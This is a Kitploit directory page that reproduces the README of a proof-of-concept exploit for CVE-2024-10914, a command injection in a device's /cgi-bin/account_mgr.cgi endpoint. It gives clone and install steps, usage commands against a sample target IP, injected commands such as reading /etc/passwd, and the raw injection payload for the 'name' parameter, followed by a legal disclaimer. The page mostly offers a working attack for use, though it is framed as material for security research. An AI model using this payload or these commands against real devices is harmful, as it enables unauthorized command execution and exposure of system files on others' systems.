Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2024-10914__POC — PoC para explotar el CVE-2024-10914 | Kitploit
Tools/GitHubGitHub/0xss3k/cve-2024-10914__poc
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingCommand and ControlLearning & Education
GitHub0xss3k/cve-2024-10914__poc

CVE-2024-10914__POC

PoC para explotar el CVE-2024-10914

View Repository
32 months agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

CVE-2024-10914 - Proof of Concept

Exploit for command injection vulnerability in the /cgi-bin/account_mgr.cgi endpoint. This vulnerability allows arbitrary command execution on the affected system through unsanitized parameters.

Vulnerability Description

CVE-2024-10914 is a command injection vulnerability affecting devices with a web CGI interface. The vulnerable application does not properly validate the name parameter in the cgi_user_add request, allowing an attacker to inject system commands that will be executed with application privileges.

Requirements

  • Python 3.7+
  • requests library

Installation

Clone the repository and install dependencies:

root@kitploit:~
git clone https://github.com/0xSS3K/CVE-2024-10914__POC.git
cd CVE-2024-10914__POC
pip install -r requirements.txt

Or install manually:

root@kitploit:~
pip install requests
Download Tool

Usage

The script provides two arguments:

root@kitploit:~
python CVE-2024-10914_EXPLOIT.py -u <URL> -c <COMMAND>

Parameters

  • -u, --url (required): Target URL (e.g. http://192.168.1.1)
  • -c, --command (optional): Command to execute (default: id)

Examples

Execute id command:

root@kitploit:~
python CVE-2024-10914_EXPLOIT.py -u http://192.168.1.1

Execute custom command:

root@kitploit:~
python CVE-2024-10914_EXPLOIT.py -u http://192.168.1.1 -c "cat /etc/passwd"

List files:

root@kitploit:~
python CVE-2024-10914_EXPLOIT.py -u http://192.168.1.1 -c "ls -la /tmp"

Technical Operation

The exploit sends a GET request to the vulnerable endpoint with the following payload:

root@kitploit:~
/cgi-bin/account_mgr.cgi?cmd=cgi_user_add&name="; <COMMAND>; "

The empty string is closed with quotes and the desired command is injected, which executes in the server context.

Response

The script will display:

  • Connection status
  • Payload sent
  • HTTP status code
  • Full server response

Legal Warning

This code is provided for educational and security research purposes only. It should only be used on systems for which you have explicit authorization. Unauthorized use of this exploit may violate local laws and constitute a crime. The author is not responsible for the misuse of this tool.

References

  • CVE-2024-10914
  • CVSS Score: TBD

Author

SS3K

License

Not specified